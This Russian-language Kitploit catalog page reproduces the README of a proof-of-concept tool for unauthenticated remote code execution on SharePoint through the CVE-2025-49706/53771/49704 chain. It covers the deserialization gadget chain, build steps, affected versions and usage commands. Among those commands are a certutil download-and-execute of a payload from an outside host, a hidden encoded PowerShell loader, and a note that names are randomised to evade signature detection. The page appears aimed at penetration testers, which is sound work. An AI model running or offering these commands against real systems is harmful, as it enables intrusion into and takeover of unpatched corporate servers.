Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubrabbitbong/oursharepoint-cve-2025-53770

OurSharePoint-CVE-2025-53770

Вы действительно думаете, что SharePoint безопасен?

Репозиторий
2116 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

OurSharePoint — CVE-2025-53770 PoC

Автономный, представляющий собой один исполняемый файл инструмент для удаленного выполнения кода (RCE) на SharePoint. Генерирует цепочку гаджетов TypeConfuseDelegate в виде необработанных байтов MS-NRBF (без ysoserial.exe), заключает её в полезную нагрузку десериализации DataSet и доставляет её через HTTP, используя обход аутентификации — всё одним махом.


Цепочка эксплойта

ШагCVEОписание
1CVE-2025-49706Обход аутентификации — Referer: /_layouts/SignOut.aspx пропускает аутентификацию SharePoint
2CVE-2025-53771Обход патча — завершающий сегмент пути после ToolPane.aspx обходит исправление июля 2025 г.
3CVE-2025-49704Десериализация — ExcelDataSet.CompressedDataTable запускает BinaryFormatter на специально подготовленном DataSet
4—Схема DataSet принуждает LosFormatter.Deserialize() для внутренней полезной нагрузки через ExpandedWrapper + ObjectDataProvider
5—TypeConfuseDelegate — компаратор SortedSet<string> является Process.Start(string, string), выполняя cmd /c <команда>

Весь двоичный поток (как внешняя обёртка DataSet, так и внутренний гаджет TypeConfuseDelegate) строится как необработанные записи MS-NRBF — сериализация .NET runtime не используется. Это соответствует формату, создаваемому модулем Metasploit, побайтово.


Сборка

Требуется .NET Framework 4.8 SDK (Visual Studio 2022 или отдельные Build Tools):

root@kitploit:~
& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

Вывод: OurSharePoint\bin\Release\OurSharePoint.exe (один файл, без зависимостей)


Использование

Однократно: разместить и выполнить

root@kitploit:~
OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

Простое выполнение команды

root@kitploit:~
OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

Загрузчик PowerShell

root@kitploit:~
OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

Только разведка (без полезной нагрузки)

root@kitploit:~
OurSharePoint.exe --target=https://sp.corp.com --check

Сборка файлов полезной нагрузки офлайн

root@kitploit:~
OurSharePoint.exe --cmd="calc.exe" --out=exploit

С прокси (Burp)

root@kitploit:~
OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

Наследие: внешняя полезная нагрузка ysoserial.exe

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

Параметры

ФлагОписаниеПо умолчанию
--cmd=КОМАНДАКоманда для выполнения (запускается как cmd /c КОМАНДА)—
--in=ФАЙЛПредварительно собранный файл полезной нагрузки base64 LosFormatter—
--target=URLБазовый URL SharePoint для доставки по HTTP—
--checkТолько определение версии, без полезной нагрузки—
--out=ПРЕФИКСПрефикс выходного файлаpayload
--sp-version=ВЕРСИЯВерсия пути Layouts (15 или 16)15
--proxy=URLHTTP прокси—
--ua=СТРОКАПользовательский User-AgentFirefox 120
--referer=URLПереопределить Referer для обхода аутентификацииauto
--timeout=СЕКТаймаут HTTP15
--a/b/c=ИМЯИмена DataSet/элементов/столбцовrandom

Выходные файлы

Когда используется --out, инструмент записывает:

ФайлСодержимое
<префикс>.binНеобработанный поток DataSet в формате BinaryFormatter
<префикс>.b64Закодировано GZip + Base64 (то, что помещается в CompressedDataTable)

Затронутые версии

РедакцияУязвимый диапазон
SharePoint Server Subscription Edition16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

Примечания по реализации

  • Отсутствие сериализации во время выполнения — Как обёртка DataSet, так и гаджет TypeConfuseDelegate записываются как необработанные двоичные записи MS-NRBF с использованием BinaryWriter. Это позволяет избежать различий между выводом сериализации .NET runtime и тем, что ожидает целевой десериализатор.
  • Обрамление LosFormatter — Внутренний гаджет обёрнут заголовочными байтами ObjectStateFormatter (0xFF 0x01 0x32 + 7-битная длина) вместо использования LosFormatter.Serialize().
  • Один двоичный файл — Не требуются внешние инструменты, DLL или скрипты Python. .exe полностью автономен.
  • Случайность — Префиксы XML-тегов и имена элементов DataSet рандомизируются при каждом выполнении для избежания обнаружения по сигнатурам.

Ссылки

  • Eye Security — SharePoint Under Siege
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • MS-NRBF Specification
  • pwntester/ysoserial.net — TypeConfuseDelegate
Скачать инструмент